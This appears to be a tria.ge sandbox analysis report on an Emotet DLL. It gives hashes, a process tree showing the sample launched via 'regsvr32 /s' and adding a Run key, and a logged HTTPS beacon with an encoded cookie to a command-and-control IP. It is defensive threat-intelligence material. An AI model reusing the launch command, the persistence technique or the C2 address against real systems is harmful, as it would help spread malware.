Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    52s
  • max time network
    103s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02/11/2022, 23:01 UTC

General

  • Target

    a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb.dll

  • Size

    629KB

  • MD5

    c9c69f06d8578c13ba70f7ab1f793da7

  • SHA1

    d9b3f7517277c896c8733f79f26c3dc7091ad58f

  • SHA256

    a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb

  • SHA512

    1ba2b828b31d0fd712343fac529f5d82ff4cfce1dffd47ea52c3b58db2e5db28f090f3a597600d255d27127c51232be9999c6a8f38e96d44356a1e510fe8f9d0

  • SSDEEP

    12288:6tGis7p49VmD3OjG7QbBtLu5WhNye5JHKVu6cig1Doa:6tGis1T3OjueLhhd5NKAD3

Malware Config

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb.dll
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: RenamesItself
    • Suspicious use of WriteProcessMemory
    PID:2496
    • C:\Windows\system32\regsvr32.exe
      C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MyNzhzM\bxLPxWBKtzwOqdi.dll"
      2⤵
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      PID:2780

Network

  • flag-kr
    GET
    https://182.162.143.56/
    regsvr32.exe
    Remote address:
    182.162.143.56:443
    Request
    GET / HTTP/1.1
    Connection: Keep-Alive
    Cookie: QTBd=BSTjci69ZUIM9QyTgkqxfK5UzzzYgM8fyZhp0TRO/pwD6XJYxD9J+3fJB3kVQeZZOu9MmOMX+u7uuBPwSJ0nYInzaF39AbprHFuE2VCxyNFfj1qoZUpHcI8V0t6jnvDYQUvMOU8Ph0RuNLGEbDFH9Kvph8ZpT3XTWnsi/4ZYmM+tzWLEqg+OTYMjT92y6T14yUlpZyvJuV0kH1p6wgAevpCsraiGwG9nk8BkOuLSoSeSyC1SPBaDl/7Hi42cw7mPk3Qj1AvoOrV10CdpdCrtcaDcyhHDwlTrNv9YEXcwlnlWE8MYaE8SsQLDELpiljkrddXRoQwJfwmUpDzf/7UzgirYbQfqjJU=
    Host: 182.162.143.56
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 02 Nov 2022 23:02:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • 13.69.109.131:443
    322 B
    7
  • 8.252.118.126:80
    322 B
    7
  • 182.162.143.56:443
    https://182.162.143.56/
    tls, http
    regsvr32.exe
    1.2kB
    2.7kB
    11
    10

    HTTP Request

    GET https://182.162.143.56/

    HTTP Response

    200
No results found

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2496-117-0x0000000180000000-0x000000018002F000-memory.dmp

    Filesize

    188KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.